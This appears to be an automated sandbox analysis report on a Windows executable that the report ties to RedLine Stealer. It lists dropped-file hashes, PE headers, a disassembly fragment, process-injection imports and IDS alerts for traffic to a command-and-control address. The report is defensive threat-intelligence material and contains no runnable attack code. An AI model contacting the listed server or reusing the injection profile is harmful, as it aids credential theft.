                                                                                                                                                                                                                      SHA-512:C517B02D4E94CF8360D98FD093BCA25E8AE303C1B4500CF4CF01F78A7D7EF5F581B99A0371F438C6805A0B3040A0E06994BA7B541213819BD07EC8C6251CB9BB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):25880
                                                                                                                                                                                                                      Entropy (8bit):6.843889819511554
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:z3vAmiFVhFWEhWGqQpBj0HRN79XJQHRN7/SCMllJXq:zvYjoqW958/ga
                                                                                                                                                                                                                      MD5:120A5DC2682CD2A838E0FC0EFD45506E
                                                                                                                                                                                                                      SHA1:8710BE5D5E9C878669FF8B25B67FB2DEB32CD77A
                                                                                                                                                                                                                      SHA-256:C14F0D929A761A4505628C4EB5754D81B88AA1FDAD2154A2F2B0215B983B6D89
                                                                                                                                                                                                                      SHA-512:4330EDF9B84C541E5ED3BB672548F35EFA75C6B257C3215FC29BA6E152294820347517EC9BD6BDE38411EFA9074324A276CF0D7D905ED5DD88E906D78780760C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):25880
                                                                                                                                                                                                                      Entropy (8bit):6.8416401850774395
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:p5yguNvZ5VQgx3SbwA71IkFZpMHqW74W8Lipsy:p5yguNvZ5VQgx3SbwA71IipMR747fy
                                                                                                                                                                                                                      MD5:F22FACA49E4D5D80EC26ED31E7ECD0E0
                                                                                                                                                                                                                      SHA1:473BCBFB78E6A63AFD720B5CBE5C55D9495A3D88
                                                                                                                                                                                                                      SHA-256:1EB30EA95DAE91054A33A12B1C73601518D28E3746DB552D7CE120DA589D4CF4
                                                                                                                                                                                                                      SHA-512:C8090758435F02E3659D303211D78102C71754BA12B0A7E25083FD3529B3894DC3AB200B02A2899418CC6ED3B8F483D36E6C2BF86CE2A34E5FD9AD0483B73040
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):22296
                                                                                                                                                                                                                      Entropy (8bit):6.97368865913958
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:SPEzaWEhW/slQpBj0HRN7sVQHRN7gkclsHTyt:Y0YRqWg8jyt
                                                                                                                                                                                                                      MD5:2FD0DA47811B8ED4A0ABDF9030419381
                                                                                                                                                                                                                      SHA1:46E3F21A9BD31013A804BA45DC90CC22331A60D1
                                                                                                                                                                                                                      SHA-256:DE81C4D37833380A1C71A5401DE3AB4FE1F8856FC40D46D0165719A81D7F3924
                                                                                                                                                                                                                      SHA-512:2E6F900628809BFD908590FE1EA38E0E36960235F9A6BBCCB73BBB95C71BFD10F75E1DF5E8CF93A682E4ADA962B06C278AFC9123AB5A4117F77D1686FF683D6F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20248
                                                                                                                                                                                                                      Entropy (8bit):7.0800725103781765
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:JBf5WEhWye9HQpBj0HRN7tKQHRN7jsAXOVlTBr:zf5dMHqWtK87U
                                                                                                                                                                                                                      MD5:FE1096F1ADE3342F049921928327F553
                                                                                                                                                                                                                      SHA1:118FB451AB006CC55F715CDF3B5E0C49CF42FBE0
                                                                                                                                                                                                                      SHA-256:88D3918E2F063553CEE283306365AA8701E60FB418F37763B4719F9974F07477
                                                                                                                                                                                                                      SHA-512:0A982046F0C93F68C03A9DD48F2BC7AEE68B9EEBEAEA01C3566B2384D0B8A231570E232168D4608A09136BCB2B1489AF802FD0C25348F743F0C1C8955EDD41C1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):841697
                                                                                                                                                                                                                      Entropy (8bit):5.484581034394053
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24576:fhidp/tosQNRs54PK4IM7Vw59bfCEnXTR32k:fhidp/tosQNRs54PK4Ip9F5
                                                                                                                                                                                                                      MD5:F4981249047E4B7709801A388E2965AF
                                                                                                                                                                                                                      SHA1:42847B581E714A407A0B73E5DAB019B104EC9AF2
                                                                                                                                                                                                                      SHA-256:B191E669B1C715026D0732CBF8415F1FF5CFBA5ED9D818444719D03E72D14233
                                                                                                                                                                                                                      SHA-512:E8EF3FB3C9D5EF8AE9065838B124BA4920A3A1BA2D4174269CAD05C1F318BC9FF80B1C6A6C0F3493E998F0587EF59BE0305BC92E009E67B82836755470BC1B13
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3381792
                                                                                                                                                                                                                      Entropy (8bit):6.094908167946797
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:49152:Y4TKuk29SIU6i5fOjPWl+0rOh5PKToEGG9I+q4dNQbZQm9aGupuu9LoeiyPaRb84:YiV+CGQ4dtBMeiJRb8+1CPwDv3uFZjN
                                                                                                                                                                                                                      MD5:BF83F8AD60CB9DB462CE62C73208A30D
                                                                                                                                                                                                                      SHA1:F1BC7DBC1E5B00426A51878719196D78981674C4
                                                                                                                                                                                                                      SHA-256:012866B68F458EC204B9BCE067AF8F4A488860774E7E17973C49E583B52B828D
                                                                                                                                                                                                                      SHA-512:AE1BDDA1C174DDF4205AB19A25737FE523DCA6A9A339030CD8A95674C243D0011121067C007BE56DEF4EAEFFC40CBDADFDCBD1E61DF3404D6A3921D196DCD81E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):32792
                                                                                                                                                                                                                      Entropy (8bit):6.372276555451265
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:JYnlpDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYPoBhT/A4:JYe0Vn5Q28J8qsqMttktuTSTWDG4yhRe
                                                                                                                                                                                                                      MD5:4424BAF6ED5340DF85482FA82B857B03
                                                                                                                                                                                                                      SHA1:181B641BF21C810A486F855864CD4B8967C24C44
                                                                                                                                                                                                                      SHA-256:8C1F7F64579D01FEDFDE07E0906B1F8E607C34D5E6424C87ABE431A2322EBA79
                                                                                                                                                                                                                      SHA-512:8ADB94893ADA555DE2E82F006AB4D571FAD8A1B16AC19CA4D2EFC1065677F25D2DE5C981473FABD0398F6328C1BE1EBD4D36668EA67F8A5D25060F1980EE7E33
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4183112
                                                                                                                                                                                                                      Entropy (8bit):6.420172758698049
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:49152:wV6CJES/Za2BaobNruDPYRQYK8JCNNtkAz+/Q46VqNo9NYxwCFIInKHJCMjntPNj:MxB/aDUQNtufeNFIKHoMjzkDU
                                                                                                                                                                                                                      MD5:D2A8A5E7380D5F4716016777818A32C5
                                                                                                                                                                                                                      SHA1:FB12F31D1D0758FE3E056875461186056121ED0C
                                                                                                                                                                                                                      SHA-256:59AB345C565304F638EFFA7C0236F26041FD06E35041A75988E13995CD28ACE9
                                                                                                                                                                                                                      SHA-512:AD1269D1367F587809E3FBE44AF703C464A88FA3B2AE0BF2AD6544B8ED938E4265AAB7E308D999E6C8297C0C85C608E3160796325286DB3188A3EDF040A02AB7
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):26696
                                                                                                                                                                                                                      Entropy (8bit):6.101296746249305
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:6kYtqIDCNdwhBfAqXuqzz5H1IGqGbWDG4y4:6TnDCNCh93X7zzR1IGqG2y4
                                                                                                                                                                                                                      MD5:6AE54D103866AAD6F58E119D27552131
                                                                                                                                                                                                                      SHA1:BC53A92A7667FD922CE29E98DFCF5F08F798A3D2
                                                                                                                                                                                                                      SHA-256:63B81AF5D3576473C17AC929BEA0ADD5BF8D7EA95C946CAF66CBB9AD3F233A88
                                                                                                                                                                                                                      SHA-512:FF23F3196A10892EA22B28AE929330C8B08AB64909937609B7AF7BFB1623CD2F02A041FD9FAB24E4BC1754276BDAFD02D832C2F642C8ECDCB233F639BDF66DD0
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1046080
                                                                                                                                                                                                                      Entropy (8bit):6.649151787942547
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24576:L1foGwlaDT22+Pk+j2ZXCE6cctEMmxvSZX0ypCD3:JfoBR2+PfXWrT
                                                                                                                                                                                                                      MD5:4E326FEEB3EBF1E3EB21EEB224345727
                                                                                                                                                                                                                      SHA1:F156A272DBC6695CC170B6091EF8CD41DB7BA040
                                                                                                                                                                                                                      SHA-256:3C60056371F82E4744185B6F2FA0C69042B1E78804685944132974DD13F3B6D9
                                                                                                                                                                                                                      SHA-512:BE9420A85C82EEEE685E18913A7FF152FCEAD72A90DDCC2BCC8AB53A4A1743AE98F49354023C0A32B3A1D919BDA64B5D455F6C3A49D4842BBBA4AA37C1D05D67
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1096264
                                                                                                                                                                                                                      Entropy (8bit):5.343512979675051
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12288:EGe9qQOZ67191SnFRFotduNFBjCmN/XlyCAx9++bBlhJk93cgewrxEeBc0bB:EGe9GK4oYhCc/+9nbDhG2wrxc0bB
                                                                                                                                                                                                                      MD5:4C0D43F1A31E76255CB592BB616683E7
                                                                                                                                                                                                                      SHA1:0A9F3D77A6E064BAEBACACC780701117F09169AD
                                                                                                                                                                                                                      SHA-256:0F84E9F0D0BF44D10527A9816FCAB495E3D797B09E7BBD1E6BD666CEB4B6C1A8
                                                                                                                                                                                                                      SHA-512:B8176A180A441FE402E86F055AA5503356E7F49E984D70AB1060DEE4F5F17FCEC9C01F75BBFF75CE5F4EF212677A6525804BE53646CC0D7817B6ED5FD83FD778
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\uFVgJVXaEU.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):312320
                                                                                                                                                                                                                      Entropy (8bit):6.296604624276584
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6144:RJRGyoPwcMZAwSYQ1rL4OgbDetMfhiRdsLoOJ0tYRVlOPAKePNO4:dGyoPwcMZhnQ1rL4OKDeohi3sLo7WY4
                                                                                                                                                                                                                      MD5:BFAE2C479A12CBC660E580A84D3E3CE0
                                                                                                                                                                                                                      SHA1:0891B36B510049EF811DEB93FCDACFDFDBFC406A
                                                                                                                                                                                                                      SHA-256:2EA05B5B9847FB2E777F4433A2F73CBA12B96A8B074AB83179CBAFBC49963665
                                                                                                                                                                                                                      SHA-512:CE53E1E95EEE76F0F49E29B91CE27C35C972980EBD8E3EA2DA387AF40C667CAE457288E183447E0513ED1C9EC0C4DE5AF6F81DADDD77C533C437EE8496D59085
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\uFVgJVXaEU.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                      Size (bytes):26
                                                                                                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Entropy (8bit):6.296604624276584
                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                      File name:uFVgJVXaEU.exe
                                                                                                                                                                                                                      File size:312'320 bytes
                                                                                                                                                                                                                      MD5:bfae2c479a12cbc660e580a84d3e3ce0
                                                                                                                                                                                                                      SHA1:0891b36b510049ef811deb93fcdacfdfdbfc406a
                                                                                                                                                                                                                      SHA256:2ea05b5b9847fb2e777f4433a2f73cba12b96a8b074ab83179cbafbc49963665
                                                                                                                                                                                                                      SHA512:ce53e1e95eee76f0f49e29b91ce27c35c972980ebd8e3ea2da387af40c667cae457288e183447e0513ed1c9ec0c4de5af6f81daddd77c533c437ee8496d59085
                                                                                                                                                                                                                      SSDEEP:6144:RJRGyoPwcMZAwSYQ1rL4OgbDetMfhiRdsLoOJ0tYRVlOPAKePNO4:dGyoPwcMZhnQ1rL4OKDeohi3sLo7WY4
                                                                                                                                                                                                                      TLSH:F2645B1B248162CFF3987273D01499B4D4FEE87556B64AA9A120F6FB171B2C34F11EB2
                                                                                                                                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                      Entrypoint:0x14000340c
                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                      Imagebase:0x140000000
                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                      Time Stamp:0x67607F4F [Mon Dec 16 19:28:15 2024 UTC]
                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                      OS Version Minor:2
                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                      File Version Minor:2
                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                      Subsystem Version Minor:2
                                                                                                                                                                                                                      Import Hash:75a1ace6800a8990783719f99f2f799f
                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      sub esp, 00000298h
                                                                                                                                                                                                                      call 00007FA42106AEB9h
                                                                                                                                                                                                                      call 00007FA42106CB24h
                                                                                                                                                                                                                      movzx eax, al
                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                      je 00007FA42106CD9Ah
                                                                                                                                                                                                                      xor ecx, ecx
                                                                                                                                                                                                                      call dword ptr [00004F5Ch]
                                                                                                                                                                                                                      call 00007FA42106DA08h
                                                                                                                                                                                                                      mov dword ptr [esp+30h], 00000104h
                                                                                                                                                                                                                      mov edx, dword ptr [esp+30h]
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea ecx, dword ptr [esp+40h]
                                                                                                                                                                                                                      call 00007FA42106D5F2h
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea edx, dword ptr [00003A92h]
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea ecx, dword ptr [esp+40h]
                                                                                                                                                                                                                      call 00007FA42106D811h
                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                      je 00007FA42106CDE1h
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      mov ecx, dword ptr [00004BD5h]
                                                                                                                                                                                                                      call 00007FA42106DB11h
                                                                                                                                                                                                                      movzx eax, al
                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                      jne 00007FA42106CDA5h
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea ecx, dword ptr [00003A82h]
                                                                                                                                                                                                                      call 00007FA42106DAFEh
                                                                                                                                                                                                                      movzx eax, al
                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                      je 00007FA42106CD9Ah
                                                                                                                                                                                                                      xor ecx, ecx
                                                                                                                                                                                                                      call dword ptr [00004D36h]
                                                                                                                                                                                                                      call 00007FA42106CBA2h
                                                                                                                                                                                                                      xor eax, eax
                                                                                                                                                                                                                      cmp eax, 01h
                                                                                                                                                                                                                      je 00007FA42106CD9Fh
                                                                                                                                                                                                                      mov ecx, 0000C350h
                                                                                                                                                                                                                      call dword ptr [00004CCFh]
                                                                                                                                                                                                                      jmp 00007FA42106CD7Eh
                                                                                                                                                                                                                      xor ecx, ecx
                                                                                                                                                                                                                      call dword ptr [00004D15h]
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea edx, dword ptr [00003A56h]
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea ecx, dword ptr [esp+40h]
                                                                                                                                                                                                                      call 00007FA42106D7ADh
                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                      je 00007FA42106CDCEh
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea ecx, dword ptr [00003A59h]
                                                                                                                                                                                                                      call 00007FA42106DAADh
                                                                                                                                                                                                                      movzx eax, al
                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                      je 00007FA42106CD9Ah
                                                                                                                                                                                                                      Programming Language:
                                                                                                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                      • [C++] VS2010 build 30319
                                                                                                                                                                                                                      • [RES] VS2010 build 30319
                                                                                                                                                                                                                      • [LNK] VS2010 build 30319

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7270 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa000 | 0x328 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x9000 | 0x24c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x5000 | 0x58 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x380b | 0x3a00 | 9692721530d9adbcb9c83b7b72f06f6c | False | 0.4084051724137931 | data | 5.45635698478597 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x5000 | 0x23b2 | 0x2400 | 7798eead5e2b85a3a847eae777ecdddb | False | 0.4345703125 | SysEx File - | 5.401627140137092 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x8000 | 0x688 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x9000 | 0x24c | 0x400 | 190b730ab38c29046d3b59082a6f2de3 | False | 0.349609375 | data | 2.608228609717788 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xa000 | 0x328 | 0x400 | b20114eeb22f771b9c36da6e2ac337ce | False | 0.361328125 | data | 2.6200573070054105 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.x64 | 0xb000 | 0x46000 | 0x45a00 | c812321de5c7baa3965689ef4cbc47f1 | False | 0.46156867145421904 | data | 6.104829327040626 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xa060 | 0x2c4 | data | English | United States | 0.4717514124293785

DLL | Import
KERNEL32.dll | GetProcAddress, GetModuleHandleA, CloseHandle, WriteProcessMemory, VirtualAllocEx, OpenProcess, GetSystemInfo, LoadLibraryA, GetVersionExW, WaitForMultipleObjects

Language of compilation system | Country where language is spoken | Map
English | United States |

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-17T10:15:02.108574+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.8 | 49708 | 185.81.68.147 | 80 | TCP
2024-12-17T10:15:04.677281+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.8 | 49709 | 185.81.68.147 | 80 | TCP
2024-12-17T10:15:05.892902+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:05.892902+0100 | 2046045 | ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:06.336483+0100 | 2043234 | ET MALWARE Redline Stealer TCP CnC - Id1Response | 1 | 185.81.68.147 | 1912 | 192.168.2.8 | 49710 | TCP
2024-12-17T10:15:11.498795+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:12.125807+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:12.247937+0100 | 2046056 | ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) | 1 | 185.81.68.147 | 1912 | 192.168.2.8 | 49710 | TCP
2024-12-17T10:15:12.671198+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:14.250236+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:14.814311+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:15.314297+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:16.035094+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:16.503808+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:16.984893+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:17.437884+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:18.066653+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:18.084242+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:18.532245+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:18.973784+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:19.415304+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:19.851257+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
2024-12-17T10:15:20.336637+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
